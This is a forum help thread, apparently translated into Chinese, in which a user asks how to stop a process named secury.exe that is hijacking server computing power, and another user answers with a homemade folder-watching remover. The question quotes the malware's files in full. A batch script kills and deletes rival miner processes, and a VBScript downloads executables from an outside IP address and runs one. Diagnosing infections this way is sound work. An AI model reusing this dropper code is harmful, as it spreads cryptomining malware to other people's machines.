我的任务管理器出现以下情况:
我不知道它是什么类型的应用程序,但肯定不是 Steam 客户端引导程序,因为我没有安装它,也无法卸载它。
如果我尝试通过以下步骤弄清楚它是什么类型的应用程序:
我看到的是这样的:
在 MS Config 实用程序中我没有找到任何类似的东西secury.exe。
当我打开文件位置时,我看到三个文件:
m.bat,,。b.exe4.vbs
以下是内容m.bat:
taskkill /f /t /im secury.exe
c:\ProgramData\secury.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im expl0rer.exe
taskkill /f /t /im ieplare.exev
taskkill /f /t /im nssm.exe
taskkill /f /t /im MSASCui.exe
taskkill /f /t /im SystemSettlngs.exe
taskkill /f /t /im SystemSetting.exe
taskkill /f /t /im Process.exe
taskkill /f /t /im winlnlt.exe
taskkill /f /t /im WindowsUpgrade.exe
taskkill /f /t /im msdc.exe
taskkill /f /t /im Fiddlere.exe
taskkill /f /t /im shovst.exe
taskkill /f /t /im lqrtqe.exe
taskkill /f /t /im apkls.exe
taskkill /f /t /im winlog.exe
taskkill /f /t /im svchosts.exe
taskkill /f /t /im win1ogins.exe
taskkill /f /t /im shovsts.exe
taskkill /f /t /im fcty.exe
taskkill /f /t /im soiuos.exe
taskkill /f /t /im TrustedInstaller.exe
del C:\Windows\System32\soiuos.exe
del C:\Windows\Setup\TrustedInstaller.exe
del C:\ProgramData\kingsoft.exe
del C:\ProgramData\expl0rer.exe
del C:\ProgramData\ieplare.exe
del C:\ProgramData\nssm.exe
del C:\ProgramData\MSASCui.exe
del C:\ProgramData\SystemSettlngs.exe
del C:\ProgramData\SystemSetting.exe
del C:\ProgramData\Process.exe
del C:\ProgramData\winlnlt.exe
del C:\ProgramData\WindowsUpgrade.exe
del C:\ProgramData\msdc.exe
del C:\ProgramData\Fiddlere.exe
del C:\ProgramData\shovst.exe
del C:\ProgramData\lqrtqe.exe
del C:\ProgramData\apkls.exe
del C:\ProgramData\winlog.exe
del C:\ProgramData\svchosts.exe
del C:\ProgramData\win1ogins.exe
del C:\ProgramData\shovsts.exe
del C:\ProgramData\fcty.exe
del C:\ProgramData\pool.exe
del C:\ProgramData\pool2.exe
del C:\ProgramData\pool3.exe
接下来是4.vbs:
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\s2.exe",2
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\pool2.exe",2
CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe"
CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"
我该怎么做才能停止secury.exe滥用我的服务器的计算能力?
PS:我已经对我的计算机执行了 Avast 全面检查,但没有发现任何错误。
答案1
我想分享我找到的解决我的问题的方法。
作为一名程序员,我创建了一个程序,可以不断监视文件夹c:\ProgramData\中是否有任何新文件。如果该文件夹中出现一些属于“steam 客户端 bootstrappper”的文件,我的程序会在执行这些文件之前将其删除。如果有人需要修改此实用程序,您可以在以下位置找到它:GitHub。
在我执行了这个原始的防病毒软件(实际上是反 PUP)后,我的系统就不再变慢了。要使该程序稳定运行,还需要一个细节,那就是创建文件夹c:\ProgramData\copyForVirus\。我让该程序创建了这些病毒文件的副本,以便稍后在更多的 VM Ware 环境中分析它们,了解这些文件的内部情况。